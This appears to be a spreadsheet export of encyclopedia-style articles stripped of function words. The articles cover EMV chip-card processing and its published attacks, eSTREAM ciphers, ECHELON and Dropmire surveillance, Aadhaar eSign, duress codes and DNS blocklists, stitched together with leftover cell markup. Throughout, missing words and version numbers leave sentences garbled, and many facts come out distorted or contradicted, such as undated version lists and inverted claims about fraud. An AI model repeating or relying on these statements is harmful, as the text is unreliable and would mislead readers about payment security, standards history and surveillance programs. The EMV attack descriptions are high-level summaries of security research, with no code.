support depending type country.for offline enciphered methods, terminal encrypts cleartext block card's public sending card verify command. online method, cleartext block encrypted terminal using point-to-point encryption sending acquirer processor authorization request message. offline methods vulnerable man-in-the-middle attacks. 2017, emvco added support biometric verification methods version specifications. terminal risk management terminal risk management performed devices decision made whether transaction authorised on-line offline. transactions always carried on-line (e.g., atms) always off-line, step skipped. terminal risk management checks transaction amount offline ceiling limit (above transactions processed on-line). also possible online counter, check card list (which necessary off-line transactions). result tests positive, terminal sets appropriate terminal verification results (tvr). terminal action analysis results previous processing steps used determine whether transaction approved offline, sent online authorization, declined offline. this done using combination data objects known terminal action codes (tacs) held terminal issuer action codes (iacs) read card. logically or'd iac, give transaction acquirer level control transaction outcome. both types action code take values denial, online, default. each action code contains series bits correspond bits terminal verification results (tvr), used terminal's decision whether accept, decline on-line payment transaction. card acquirer; practice card schemes advise settings used particular terminal type depending capabilities. card issuer; card issuers decide expired cards rejected, setting appropriate denial iac. other issuers want transaction proceed on-line cases allow transactions carried out.when online-only device performs iac—online tac—online processing relevant "transaction value exceeds floor limit". because floor limit zero, transaction always online values tac—online iac—online irrelevant. online-only devices need perform iac-default processing. online-only device always attempts on-line authorization request, unless declined off-line issuer action codes—denial settings. during iac—denial tac—denial processing, online device, relevant terminal verification results "service allowed". first card action analysis data objects read card read application data stage cdol1 (card data object list). this object list tags card wants sent make decision whether approve decline transaction (including transaction amount, many data objects too). terminal sends data requests cryptogram using generate application cryptogram command. depending terminal's decision (offline, online, decline), terminal requests following cryptograms card: transaction certificate (tc)—offline approval authorization request cryptogram (arqc)—online authorization application authentication cryptogram (aac)—offline declinethis step gives card opportunity accept terminal's action analysis decline transaction force transaction on-line. card cannot return arqc asked for, return arqc asked for. online transaction authorization transactions online arqc requested. arqc sent authorisation message. card generates arqc. format depends card application. specify contents arqc. arqc created card application digital signature transaction details, card issuer check real time. this provides strong cryptographic check card genuine. issuer responds authorization request response code (accepting declining transaction), authorisation response cryptogram (arpc) optionally issuer script string commands sent card).arpc processing performed contact transactions processed visa quick chip mastercard m/chip fast, contactless transactions across schemes card removed reader arqc generated. second card action analysis cdol2 (card data object list) contains list tags card wanted sent online transaction authorisation (response code, arpc, etc.). even reason terminal could online (e.g., communication failure), terminal send data card using generate authorisation cryptogram command. this lets card know issuer's response. card application reset offline usage limits. issuer script processing card issuer wants update card post issuance send commands card using issuer script processing. issuer scripts meaningless terminal encrypted card issuer provide additional security. issuer script used block cards, change card parameters.issuer script processing available contact transactions processed visa quick chip mastercard m/chip fast, contactless transactions across schemes. chip specification first version standard published 1995. standard defined managed privately owned corporation emvco llc. current members emvco american express, discover financial, international, mastercard, china unionpay, visa inc. each organizations owns equal share emvco representatives emvco organization emvco working groups. recognition compliance standard (i.e., device certification) issued emvco following submission results testing performed accredited testing house.emv compliance testing levels: level covers physical, electrical transport level interfaces, level covers payment application selection credit financial transaction processing.after passing common emvco tests, software must certified payment brands comply proprietary implementations visa vsdc, american express aeips, mastercard mchip, jsmart, emv-compliant implementations non-emvco members link interac canada. list documents standards 2011, since version 4.0, official standard documents define components payment system published four "books" additional documents: book application independent terminal interface requirements book security management book application specification book cardholder, attendant, acquirer interface requirements common payment application specification card personalisation specification versions first standard came view 1995 2.0. this upgraded 1996 (sometimes referred '96) later amendments 3.1.1 1998. this amended version december 2000 (sometimes referred 2000). version became effective june 2004. version became effective june 2007. version effect since june 2008. version effect since november 2011. vulnerabilities opportunities harvest pins clone magnetic stripes addition track-two data magnetic stripe, cards generally identical data encoded chip, read part normal transaction process. reader compromised extent conversation card terminal intercepted, attacker able recover track-two data pin, allowing construction magnetic stripe card, which, usable chip terminal, used, example, terminal devices permit fallback magstripe processing foreign customers without chip cards, defective cards. this attack possible offline presented plaintext entry device card, magstripe fallback permitted card issuer geographic behavioural checking carried card issuer.apacs, representing payment industry, claimed changes specified protocol (where card verification values differ magnetic stripe chip icvv) rendered attack ineffective measures would place january 2008. tests cards february 2008 indicated delayed. successful attacks conversation capturing form attack reported taken place shell terminals 2006, forced disable authentication filling stations million stolen customers.in october 2008, reported hundreds card readers britain, ireland, netherlands, denmark, belgium expertly tampered china shortly manufacture. months details pins credit debit cards sent mobile phone networks criminals lahore, pakistan. united states national counterintelligence executive joel brenner said, "previously nation state's intelligence agency would capable pulling type operation. it's scary." data typically used couple months card transactions make harder investigators vulnerability. after fraud discovered found tampered-with terminals could identified additional circuitry increased weight tens millions pounds sterling believed stolen. this vulnerability spurred efforts implement better control electronic devices entire life cycle, practice endorsed electronic payment security standards like developed secure vendor alliance (spva). harvesting stripe cloning february 2008 newsnight programme cambridge university researchers steven murdoch saar drimer demonstrated example attack, illustrate chip secure enough justify passing liability prove fraud banks onto customers. cambridge university exploit allowed experimenters obtain card data create magnetic stripe pin. apacs, payments association, disagreed majority report, saying "the types attack entry devices detailed report difficult undertake currently economically viable fraudster carry out." they also said changes protocol (specifying different card verification values chip magnetic stripe icvv) would make attack ineffective january 2008. fraud reported october 2008 operated months (see above) probably operation time, discovered many months. august 2016, corporation security researchers showed credit card thieves rewrite code magnetic strip make appear like chipless card, allows counterfeiting. 2010: hidden hardware disables checking stolen card february 2010 murdoch drimer's team cambridge university announced found flaw chip serious think shows whole system needs re-write" simple shocked them". stolen card connected electronic circuit fake card inserted terminal ("man-in-the-middle attack"). four digits typed accepted valid pin.a team bbc's newsnight programme visited cambridge university cafeteria (with permission) system, able using cards thief would stolen cards) connected circuit, inserting fake card typing "0000" pin. transactions registered normal, picked banks' security systems. member research team said, "even small-scale criminal systems better equipment have. amount technical sophistication needed carry attack really quite low." announcement vulnerability said, "the expertise required high (undergraduate level electronics) dispute assertion banking industry criminals sophisticated enough, already demonstrated higher level skill necessary attack miniaturized entry device skimmers." known vulnerability exploited.emvco disagreed published response saying that, attack might theoretically possible, would extremely difficult expensive carry successfully, current compensating controls likely detect limit fraud, possible financial gain attack minimal risk declined transaction exposure fraudster significant.when approached comment, several banks (co-operative bank, barclays hsbc) said industry-wide issue, referred newsnight team banking trade association comment. according phil jones consumers' association, chip helped bring instances card crime, many cases remain unexplained. "what know cases brought forward individuals seem quite persuasive."because submission suppressed, exact equivalent merchant performing bypass transaction. such transactions cannot succeed offline, card never generates offline authorisation without successful entry. result this, transaction arqc must submitted online issuer, knows arqc generated without successful submission (since information included encrypted arqc) hence would likely decline transaction high value, character, otherwise outside typical risk management parameters issuer.originally, bank customers prove negligent getting redress, regulations force november 2009 placed onus firmly banks prove customer negligent dispute, customer given months make claim. murdoch said "[the banks] look back previous transactions customer said used bank record showed has, consider refunding customers could victim type fraud." 2011: downgrade allows arbitrary harvest cansecwest conference march 2011, andrea barisani daniele bianco presented research uncovering vulnerability would allow arbitrary harvesting despite cardholder verification configuration card, even supported cvms data signed.the harvesting performed chip skimmer. essence, list modified downgrade offline still honoured terminals, despite signature invalid. bypass 2020, researchers david basin, ralf sasse, jorge toro zurich reported critical security issue affecting visa contactless cards: lack cryptographic protection critical data sent card terminal transaction. data question determines cardholder verification method (cvm, verification) used transaction. team demonstrated possible modify data trick terminal believing required cardholder verified using device (e.g. smartphone). researchers developed proof-of-concept android effectively turns physical visa card mobile payment (e.g. apple pay, google pay) perform pin-free, high-value purchases. attack carried using nfc-enabled smartphones, held near physical card second held near payment terminal. attack might affect cards discover china's unionpay demonstrated practice, contrast visa cards. early 2021, team disclosed mastercard cards also vulnerable bypass attack. they showed criminals trick terminal transacting mastercard contactless card believing visa card. this card brand mixup critical consequences since used combination bypass visa also bypass mastercard cards. "complex systems must analyzed automated tools, like model checkers", researchers point main takeaway findings. opposed humans, model-checking tools like tamarin task since deal complexity real-world systems like emv. implementation stands "europay, mastercard, visa", three companies created standard. standard managed emvco, consortium financial companies. additional widely known chips standard are: aeips: american express uics: china union smart: d-pas: discover/diners club international rupay: npci vervevisa mastercard also developed standards using cards devices support card present transactions (cnp) telephone internet. mastercard chip authentication program (cap) secure e-commerce. implementation known emv-cap supports number modes. visa dynamic passcode authentication (dpa) scheme, implementation using different default values. many countries world, debit card and/or credit card payment networks implemented liability shifts. normally, card issuer liable fraudulent transactions. however, liability shift implemented, merchant's point sale terminal support emv, owner merchant liable fraudulent transaction. chip systems cause problems travellers countries issue chip cards retailers refuse accept chipless cards. while terminals still accept magnetic strip card, major credit card brands require vendors accept them, staff refuse take card, belief held liable fraud card cannot verify pin. non-chip-and-pin cards also work unattended vending machines example, train stations, self-service check-out tills supermarkets. africa mastercard's liability shift among countries within region took place january 2006. october 2010, liability shift occurred point sale transactions. visa's liability shift points sale took place january 2006. atms, liability shift took place january 2008. south africa mastercard's liability shift took place january 2005. asian pacific countries mastercard's liability shift among countries within region took place january 2006. october 2010, liability shift occurred point sale transactions, except domestic transactions china japan. visa's liability shift points sale took place october 2010. atms, liability shift date took place october 2015, except china, india, japan, thailand, liability shift october 2017. domestic transactions china currently subject liability shift deadline. australia mastercard required point sale terminals capable april 2013. atms, liability shift took place april 2012. atms must compliant 2015. visa's liability shift atms took place april 2013. malaysia malaysia first country world completely migrate emv-compliant smart cards years implementation 2005. zealand mastercard required point sale terminals compliant july 2011. atms, liability shift took place april 2012. atms required compliant 2015. visa's liability shift atms april 2013. europe mastercard's liability shift took place january 2005. visa's liability shift points sale took place january 2006. atms, liability shift took place january 2008. france card fraud since introduction 1992 (see carte bleue). united kingdom chip trialled northampton, england 2003, result rolled nationwide united kingdom february 2006 advertisements press national television touting "safety numbers" slogan. during first stages deployment, fraudulent magnetic swipe card transaction deemed occurred, retailer refunded issuing bank, case prior introduction chip pin. january 2005, liability transactions shifted retailer; acted incentive retailers upgrade point sale (pos) systems, major high-street chains upgraded time deadline. many smaller businesses initially reluctant upgrade equipment, required completely system—a significant investment. cards featuring magnetic strips chips issued major banks. replacement pre-chip cards major issue, banks simply stated consumers would receive cards "when card expires" despite many people cards expiry dates late 2007. card issuer switch lost major contract hbos visa, ready issue cards early bank wanted. chip implementation criticised designed reduce liability banks cases claimed card fraud requiring customer prove acted "with reasonable care" protect card, rather bank prove signature matched. before chip pin, customer's signature forged, banks legally liable reimburse customer. until november 2009 protecting consumers fraudulent chip transactions, voluntary banking code. there many reports banks refused reimburse victims fraudulent card use, claiming systems could fail circumstances reported, despite several documented successful large-scale attacks.the payment services regulations 2009 came force november 2009 shifted onus onto banks prove, rather assume, cardholder fault. financial services authority (fsa) said bank, building society credit card company show transaction made you, breakdown procedures technical difficulty" refusing liability. latin america caribbean mastercard's liability shift among countries within region took place january 2005. visa's liability shift points sale took place october 2012, countries region already implemented liability shift. atms, liability shift took place october 2014, countries region already implemented liability shift. brazil mastercard's liability shift took place march 2008. visa's liability shift points sale took place april 2011. atms, liability shift took place october 2012. colombia mastercard's liability shift took place october 2008. mexico discover implemented liability shift october 2015. pump stations, liability shift october 2017. visa's liability shift points sale took place april 2011. atms, liability shift took place october 2012. venezuela mastercard's liability shift took place july 2009. middle east mastercard's liability shift among countries within region took place january 2006. october 2010, liability shift occurred point sale transactions. visa's liability shift points sale took place january 2006. atms, liability shift took place january 2008. north america canada american express implemented liability shift october 2012. discover implemented liability shift october 2015 transactions except pay-at-the-pump stations; transactions shifted october 2017. interac (canada's debit card network) stopped processing non-emv transactions atms december 2012, mandated transactions point-of-sale terminals september 2016, liability shift taking place december 2015. mastercard implemented domestic transaction liability shift march 2011, international liability shift april 2011. pump stations, liability shift implemented december 2012. visa implemented domestic transaction liability shift march 2011, inter</t>
  </si>
  <si>
    <t>TEM (currency)</t>
  </si>
  <si>
    <t>(greek: τοπική εναλλακτική μονάδα ("alternative monetary unit"); abbrv: local exchange trading system (lets) popular volos, magnesia, greece. also european sovereign-debt crisis local exchange trading system ovolos, similar system patras, greece. references external links official site (greek)</t>
  </si>
  <si>
    <t>ESTREAM</t>
  </si>
  <si>
    <t>estream project "identify stream ciphers suitable widespread adoption", organised ecrypt network. result failure stream ciphers submitted nessie project. call primitives first issued november 2004. project completed april 2008. project divided separate phases project goal find algorithms suitable different application profiles. profiles submissions estream fall either profiles: profile "stream ciphers software applications high throughput requirements" profile "stream ciphers hardware applications restricted resources limited storage, gate count, power consumption."both profiles contain subcategory ciphers also provide authentication addition encryption. phase none ciphers providing authentication considered (the cipher authentication removed improve performance). estream portfolio september 2011 following ciphers make estream portfolio: these free use. rabbit patent pending estream competition, released public domain october 2008.the original portfolio, published phase consisted ciphers plus f-fcsr profile however, cryptanalysis f-fcsr revision portfolio september 2008 removed cipher. phases phase phase included general analysis submissions purpose selecting subset submitted designs scrutiny. designs scrutinized based criteria security, performance (with respect block cipher aes—a government approved standard, well candidates), simplicity flexibility, justification supporting analysis, clarity completeness documentation. submissions profile accepted demonstrated software performance superior aes-128 counter mode. activities phase included large amount analysis presentations analysis results well discussion. project also developed framework testing performance candidates. framework used benchmark candidates wide variety systems. march 2006, estream project officially announced phase phase august 2006, phase officially started. profiles, number algorithms selected focus phase algorithms. these designs estream finds particular interest encourages cryptanalysis performance evaluation algorithms. additionally number algorithms profile accepted phase algorithms, meaning still valid estream candidates. focus candidates re-classified every months. phase phase started april 2007. candidates profile (software) are: cryptmt (version dragon (hc-128 hc-256) (lex-128, lex-192 lex-256) (nlsv2, encryption only, authentication) rabbit salsa20/12 sosemanukcandidates profile (hardware) are: decim (decim decim-128) f-fcsr (f-fcsr-h f-fcsr-16) grain (grain grain-128) mickey (mickey mickey-128 2.0) moustique, pomaranch (version triviumphase ended april 2008, announcement candidates selected final estream portfolio. selected profile algorithms were: hc-128, rabbit, salsa20/12, sosemanuk. selected profile algorithms were: f-fcsr-h grain mickey trivium. submissions estream portfolio estream portfolio ciphers are, january 2012: versions estream portfolio ciphers support extended lengths: note 128-bit version grain longer supported designers replaced grain-128a. grain-128a considered part estream portfolio. december 2008: longer estream portfolio this cipher original portfolio removed revision published september 2008. selected phase candidates portfolio selected phase focus candidates phase candidates selected phase candidates focus phase candidates selected focus phase candidates also process caesar competition competition design authenticated encryption schemes nessie cryptrec references external links homepage project discussion forum estream testing framework [45] update (pdf) notes ecrypt stream cipher project daniel bernstein</t>
  </si>
  <si>
    <t>ECHELON</t>
  </si>
  <si>
    <t>echelon, originally secret government code name, surveillance program (signals intelligence/sigint collection analysis network) operated five signatory states ukusa security agreement: australia, canada, zealand, united kingdom united states, also known five eyes.created late 1960s monitor military diplomatic communications soviet union eastern bloc allies cold war, echelon project became formally established 1971.by 20th century, system referred "echelon" evolved beyond military diplomatic origins global system interception private commercial communications" (mass surveillance industrial espionage). name european parliament's temporary committee echelon interception system stated, seems likely, view evidence consistent pattern statements wide range individuals organisations, including american sources, name fact echelon, although relatively minor detail". intelligence community uses many code names (see, example, cryptonym). former employee margaret newsham said worked configuration installation software makes echelon system employed lockheed martin, 1974 1984 sunnyvale, california, united states, menwith hill, england, time, according newsham, code name echelon nsa's term computer network itself. lockheed called p415. software programs called silkworth sire. satellite named vortex intercepted communications. image available internet fragment apparently torn description shows echelon listed along several code names.britain's guardian newspaper summarized capabilities echelon system follows: global network electronic stations eavesdrop telephones, faxes computers. even track bank accounts. this information stored echelon computers, keep millions records individuals. officially, however, echelon exist. documents leaked former contractor edward snowden revealed echelon system's collection satellite data also referred fornsat abbreviation "foreign satellite collection". reporting disclosures public disclosures (1972–2000) former analyst perry fellwock, pseudonym winslow peck, first blew whistle echelon ramparts 1972, revealed existence global network listening posts told experiences working there. also revealed existence nuclear weapons israel 1972, widespread involvement personnel drugs human smuggling, operatives leading nationalist chinese (taiwan) commandos burning villages inside borders.in 1982, james bamford, investigative journalist author wrote puzzle palace, in-depth look inside workings nsa, super-secret agency, massive eavesdropping operation codename "shamrock". used many codenames, shamrock codename used echelon prior 1975.in 1988, margaret newsham, lockheed employee contract, disclosed echelon surveillance system members congress. newsham told member congress telephone calls strom thurmond, republican senator, collected nsa. congressional investigators determined "targeting political figures would occur accident, designed system start."also 1988, article titled "somebody's listening", written investigative journalist duncan campbell statesman, described signals intelligence gathering activities program code-named "echelon". james bamford describes system software controlling collection distribution civilian telecommunications traffic conveyed using communication satellites, collection undertaken ground stations located footprint downlink leg.a detailed description echelon provided zealand journalist nicky hager 1996 book secret power: zealand's role international network. years later, hager's book cited european parliament report titled appraisal technology political control" 168.184).in march 1999, first time history, australian government admitted news reports secret ukusa agreement true. martin brady, director australia's defence signals directorate (dsd, known australian signals directorate, asd) told australian broadcasting channel nine network "does co-operate counterpart signals intelligence organisations overseas ukusa relationship."in 2000, james woolsey, former director central intelligence agency, confirmed intelligence uses interception systems keyword searches monitor european businesses.lawmakers united states feared echelon system could used monitor citizens. according york times, echelon system "shrouded secrecy existence difficult prove." critics said echelon system emerged cold "big brother without cause". european parliament investigation (2000–2001) program's capabilities political implications investigated committee european parliament 2000 2001 report published 2001. july 2000, temporary committee echelon interception system established european parliament investigate surveillance network. chaired portuguese politician carlos coelho, charge supervising investigations throughout 2000 2001. 2001, committee finalised report echelon system, delegation travelled washington, d.c. attend meetings officials following agencies departments: central intelligence agency (cia) department commerce (doc) national security agency (nsa)all meetings cancelled government committee forced trip prematurely. according correspondent 2001, "the government still refuses admit echelon even exists."in july 2001, committee released final report. september 2001, european parliament voted accept report.the european parliament stated report term echelon used number contexts, evidence presented indicates name signals intelligence collection system. report concludes that, basis information presented, echelon capable interception content inspection telephone calls, fax, e-mail data traffic globally interception communication bearers including satellite transmission, public switched telephone networks (which carried internet traffic), microwave links. confirmation echelon (2015) internal newsletters january 2011 july 2012, published part edward snowden's leaks website intercept august 2015, first time confirmed used code word echelon provided details scope program: echelon part umbrella program code name frosting, established 1966 collect process data communications satellites. frosting sub-programs: transient: intercepting soviet satellite transmissions echelon: intercepting intelsat satellite transmissions organization ukusa intelligence community assessed european parliament (ep) 2000 include signals intelligence agencies member states: government communications headquarters united kingdom, national security agency united states, communications security establishment canada, australian signals directorate australia, government communications security bureau zealand.the report concluded seemed likely echelon method sorting captured signal traffic, rather comprehensive analysis tool. likely satellite intercept stations 2001, report listed following ground stations likely have, had, role intercepting transmissions telecommunications satellites: hong kong (since closed) australian defence satellite communications station (geraldton, western australia) menwith hill (yorkshire, (reportedly largest echelon facility) misawa base (japan) gchq bude, formerly known gchq morwenstow (cornwall, pine (northern territory, australia close alice springs) sugar grove (west virginia, (since closed) yakima training center (washington, (since closed) gcsb waihopai (new zealand) gcsb tangimoana (new zealand) leitrim (ontario, canada) teufelsberg (berlin, germany) (closed 1992) responsible listening eastern bloc. other potentially related stations following stations listed report ones whose roles "cannot clearly established": ayios nikolaos (british sovereign base area dhekelia, cyprus cyprus) gibraltar (uk) diego garcia (uk) aibling station (bad aibling, germany relocated griesheim/darmstadt 2004. buckley space force base (aurora, colorado, fort gordon (georgia, gander (newfoundland labrador, canada) guam (pacific ocean, kunia regional sigint operations center (hawaii, lackland force base, medina annex (san antonio, texas, edzell (scotland) boulmer (england) history context ability intercept communications depends medium used, radio, satellite, microwave, cellular fiber-optic. during world 1950s, high-frequency ("short-wave") radio widely used military diplomatic communication could intercepted great distances. rise geostationary communications satellites 1960s presented possibilities intercepting international communications. 1964, plans establishment echelon network took dozens countries agreed establish international telecommunications satellite organization (intelsat), would operate global constellation communications satellites. 1966, first intelsat satellite launched orbit. from 1970 1971, government communications headquarters (gchq) britain began operate secret signal station morwenstow, near bude cornwall, england. station intercepted satellite communications atlantic indian oceans. soon afterwards, national security agency (nsa) built second signal station yakima, near seattle, interception satellite communications pacific ocean. 1981, gchq started construction first global wide area network (wan). soon australia, canada, zealand joined echelon system. report european parliament 2001 states: ukusa states operate listening stations relevant regions earth, principle intercept telephone, fax, data traffic transmitted satellites."most reports echelon focus satellite interception. testimony european parliament indicated separate similar ukusa systems place monitor communication undersea cables, microwave transmissions, lines. report european parliament points interception private communications foreign intelligence services necessarily limited british foreign intelligence services. role satellites point-to-point voice data communications largely supplanted fiber optics. 2006, world's long-distance voice data traffic carried optical-fiber. proportion international communications accounted satellite links said decreased substantially amount 0.4% central europe. even less-developed parts world, communications satellites used largely point-to-multipoint applications, video. thus, majority communications longer intercepted earth stations; collected tapping cables intercepting line-of-sight microwave signals, possible limited extent. concerns british journalist duncan campbell zealand journalist nicky hager said 1990s united states exploiting echelon traffic industrial espionage, rather military diplomatic purposes. examples alleged journalists include gear-less wind turbine technology designed german firm enercon speech technology developed belgian firm lernout hauspie.in 2001, temporary committee echelon interception system recommended european parliament citizens member states routinely cryptography communications protect privacy, economic espionage echelon conducted intelligence agencies.american author james bamford provides alternative view, highlighting legislation prohibits intercepted communications commercial purposes, although elaborate intercepted communications used part all-source intelligence process.in report, committee european parliament stated categorically echelon network used intercept military communications, also private business ones. epigraph report, parliamentary committee quoted juvenal, "sed quis custodiet ipsos custodes." ("but watch watchers"). james bamford, guardian 2001, warned echelon continue unchecked, could become "cyber secret police, without courts, juries, right defence".alleged examples espionage conducted members "five eyes" include: behalf british prime minister margaret thatcher, communications security establishment allegedly spied british cabinet ministers 1983. national security agency spied intercepted phone calls diana, princess wales right died paris crash dodi fayed 1997. currently holds 1,056 pages classified information princess diana, classified secret "because disclosure could reasonably expected cause exceptionally grave damage national security damage would caused information diana, documents would disclose 'sources methods' intelligence gathering". official said "the references diana intercepted conversations 'incidental'," never 'target' eavesdropping. agents monitored conversations secretary-general united nations, kofi annan. agents gathered "detailed biometric information" secretary-general united nations, ki-moon. early 1990s, national security agency intercepted communications european aerospace company airbus saudi arabian national airline. 1994, airbus lost billion contract saudi arabia nsa, acting whistleblower, reported airbus officials bribing saudi officials secure contract. result, american aerospace company mcdonnell douglas (now part boeing) multibillion-dollar contract instead airbus. united states defense contractor raytheon us$1.3 billion contract government brazil monitor amazon rainforest central intelligence agency (cia), acting whistleblower, reported raytheon's french competitor thomson-alcatel paying bribes contract. order boost united states position trade negotiations japanese trade minister ryutaro hashimoto, 1995 eavesdropped conversations japanese bureaucrats executives manufacturers toyota nissan. workings first united states satellite ground station echelon collection program built 1971 military firing training center near yakima, washington. facility, codenamed jackknife, investment 21.3 million dollars around people. satellite traffic intercepted 30-meter single-dish antenna. station became fully operational october 1974. connected headquarters fort meade 75-baud secure teletype orderwire channel.in 1999 australian senate joint standing committee treaties told professor desmond ball pine facility used ground station satellite-based interception network. satellites said large radio dishes meters diameter geostationary orbits. original purpose network monitor telemetry 1970s soviet weapons, defence radars' capabilities, satellites' ground stations' transmissions ground-based microwave communications. examples industrial espionage 1999, enercon, german company leading manufacturer wind energy equipment, developed breakthrough generator wind turbines. after applying patent, learned kenetech, american rival, submitted almost identical patent application shortly before. statement former employee, later discovered secretly intercepted monitored enercon's data communications conference calls passed information regarding generator kenetech. german intelligence services forbidden engaging industrial economic espionage, german companies frequently complaining leaves defenceless industrial espionage united states. according wolfgang hoffmann, former manager bayer, german intelligence services know companies targeted intelligence agencies, refuse inform companies involved. also 2013 mass surveillance disclosures advise frenchelon list government surveillance projects mass surveillance onyx (interception system), swiss "echelon" operation bells bibliography aldrich, richard gchq: uncensored story britain's most secret intelligence agency, harpercollins, july 2010. isbn 978-0-00-727847-3 bamford, james; puzzle palace, penguin, isbn 0-14-006748-5; 1983 bamford, james; shadow factory: ultra-secret 9/11 eavesdropping america, doubleday, isbn 0-385-52132-4; 2008 hager, nicky; secret power: zealand's role international network; craig potton publishing, nelson, isbn 0-908802-35-8; 1996 keefe, patrick radden chatter: dispatches secret world global eavesdropping; random house publishing, york, isbn 1-4000-6034-6; 2005 keefe, patrick (2006). chatter uncovering echelon surveillance network secret world global eavesdropping. york: random house trade paperbacks. isbn 978-0-8129-6827-9. lawner, kevin post-sept. 11th international surveillance activity failure intelligence: echelon interception system fundamental right privacy europe, pace int'l rev. (2002) notes references external links campbell, duncan august 2015). "gchq life unmasking british eavesdroppers". intercept. "paper echelon role comint". heise. 2001.</t>
  </si>
  <si>
    <t>ESign (India)</t>
  </si>
  <si>
    <t>aadhaar esign online electronic signature service india facilitate aadhaar holder digitally sign document. signature service facilitated authenticating aadhaar holder aadhaar-based e-kyc (electronic know your customer) service.to esign document, aadhaar card mobile number registered aadhaar. with things, indian citizen sign document remotely without physically present. procedure notification issued government india regard stipulates following procedure e-authentication using aadhaar e-kyc services. authentication electronic record e-authentication technique shall done applicable e-authentication, hash function, asymmetric cryptosystem techniques, leading issuance digital signature certificate certifying authority, trusted third party service subscriber's pair generation, storing pairs hardware security module creation digital signature provided trusted third party shall offered certifying authority (the trusted third party shall send application form certificate signing request certifying authority issuing digital signature certificate subscriber), issuance digital signature certificate certifying authority shall based e-authentication, particulars given prescribed format, digitally signed verified information aadhaar e-kyc services electronic consent digital signature certificate applicant, manner requirements e-authentication shall issued controller time time, security procedure creating subscriber’s pair shall accordance e-authentication guidelines issued controller, standards referred rule information technology (certifying authorities) rules, 2000 shall complied with, relate certification function public digital signature certificate applicant, manner information authenticated means digital signature shall comply standards specified rule information technology (certifying authorities) rules, 2000 relate creation, storage transmission digital signature. esign service providers organisations individuals seeking obtain esigning service utilize services various service providers. there empanelled service providers organisations register application service prover submitting requisite documents, getting access, building application around service going audit cert-in empanelled auditor.however, process registering application service provider cumbersome, requires huge investments time, money resources complying regulations building suitable application. most organisations prefer using services plug-n-play gateway providers take responsibility complying regulations, hence simplifying process market. also digilocker references</t>
  </si>
  <si>
    <t>Duress code</t>
  </si>
  <si>
    <t>duress code covert distress signal used individual coerced hostile persons. used warn others forced something will. typically, warning given innocuous signal embedded normal communication, code-word phrase spoken conversation alert personnel. alternatively, signal incorporated authentication process itself, typically form panic password, distress password, duress distinct user's normal password pin. these concepts related panic alarm often achieve outcome. civilian usage some home property alarm systems duress pins, last digits reset code switched around. entering code duress assailant trigger silent alarm, alerting police security personnel covert manner. implementation feature without controversy, claimed lead false alarms. similar mechanism, safetypin, proposed atms. 2010, federal trade commission issued report studying viability mechanisms atms. they noted duress pins never actually implemented atm, conclude costs deployment outweighs likelihood actually deter criminal activity. when duress used trigger silent alarm, adversary always request advance ensure appropriately modified entered instead. adversary know correct, choose randomly possible codes allowing succeed half time.in scenarios panic password used limit access control, instead triggering alarm, insufficient single panic password. adversary knows system, common assumption, simply force user authenticate twice using different passwords gain access least attempts. more complex panic password schemes proposed address problem.for cases verbal communication (e.g. cell phone) possible family member friend, covert phrase used signal duress. slim chance captor allows person duress cell phone (e.g. obtain pin), limited opportunity duress code. because conversations often monitored captor, must subtle short. ideally, duress code confirmed current situation, family member friend verifiable evidence something wrong, authorities notified limited speculation. examples would include asking someone something) exist. example, person might "what cindy barking at?" knows either different name dog. another example, also widely shared urban legend, would person calling help pretending order pizza delivery. while generally taken urban legend, happen brazil.in addition duress code, duress activity. this include duressed individual withdrawing cash using specific credit card, instead using debit card. many credit card companies allow email alerts specific activity occurs. there technical issues could pose problems, delay notification, cellular network availability, fact location disclosed, activity. civilian commercial aircraft transponder code 7500 duress code indicate hijacking. airlines maintain verbal hijack code, well. military usage world duress code used telephone agents occupied europe, involved giving coded answer someone checked whether convenient visit safe-house. genuinely safe visit, answer would "no, busy." however, safe-house compromised (e.g. nazis captured forcing occupants answer phone gunpoint order lure members network) captured agent would "yes, come over." having warned safe-house compromised, agent would hang phone immediately inform team-members could take appropriate action. typically, meant using escape evasion procedures, captured agent tortured gestapo forced give incriminating information names addresses.in major cold incident 1968, navy ship pueblo attacked captured north korean forces, crew abused tortured subsequent months. during period, north koreans used crew propaganda purposes, crew signaled duress situation secretly giving "the finger" staged photos. admiral jeremiah denton became famous blinking word "torture" morse code propaganda television broadcast captured north vietnamese forces. also between silk cyanide, book cryptographer marks describing, among things, misuse duress radio codes world leading capture dutch resistance agents safeword references external links panic passwords: authenticating duress report emergency technology with atms duress detection authentication attacks against multiple administrators false alarm reduction association military access control</t>
  </si>
  <si>
    <t>Dropmire</t>
  </si>
  <si>
    <t>dropmire surveillance program united states' national security agency (nsa) aimed surveillance foreign embassies diplomatic staff, including nato allies. program's existence revealed june 2013 whistleblower edward snowden guardian newspaper. report reveals least foreign embassies surveillance, back 2007. earlier june 2013, guardian reported spied diplomats 2009 g-20 london summit, precise program name revealed time.diplomatic spying united states revealed back 2010, revealed agencies spied secretary-general united nations, ki-moon time, known done part systematic program. also crypto global surveillance disclosures (1970–2013) global surveillance disclosures (2013–present) spying united nations leaders united states diplomats room 641a tempora references</t>
  </si>
  <si>
    <t>Domain Name System-based blocklist</t>
  </si>
  <si>
    <t>domain name system blocklist, domain name system-based blackhole list, domain name system blacklist (dnsbl) real-time blackhole list (rbl) service operation mail servers perform check domain name system (dns) query whether sending host's address blacklisted email spam. most mail server software configured check lists, typically rejecting flagging messages sites. dnsbl software mechanism, rather specific list policy. dozens dnsbls exist. they wide array criteria listing delisting addresses. these include listing addresses zombie computers machines used send spam, internet service providers (isps) willingly host spammers, sent spam honeypot system. since creation first dnsbl 1998, operation policies lists frequently controversial, internet advocacy circles occasionally lawsuits. many email systems operators users consider dnsbls valuable tool share information sources spam, others including prominent internet activists objected form censorship. addition, small number dnsbl operators target lawsuits filed spammers seeking lists shut down. history first dnsbl real-time blackhole list (rbl), created 1997, first border gateway protocol (bgp) feed paul vixie, dnsbl eric ziegast part vixie's mail abuse prevention system (maps); dave rand abovenet first subscriber. first version published dnsbl, rather list networks transmitted routers owned subscribers network operators could drop tcp/ip traffic machines used send spam host spam supporting services, website. inventor technique later commonly called dnsbl eric ziegast employed vixie enterprises. term "blackhole" refers networking black hole, expression link network drops incoming traffic instead forwarding normally. intent sites using would refuse traffic sites supported spam whether actively sending spam, ways. before address would listed rbl, volunteers maps staff would attempt repeatedly contact persons responsible problems corrected. such effort considered important black-holing network traffic, also meant spammers spam supporting isps could delay long periods discussions went later, also released dnsbl form paul vixie encouraged authors sendmail mail software implement support clients. these allowed mail software query reject mail listed sites per-mail-server basis instead black-holing traffic. soon advent rbl, others started developing lists different policies. first alan brown's open relay behavior-modification system (orbs). this used automated testing discover list mail servers running open mail relays—exploitable spammers 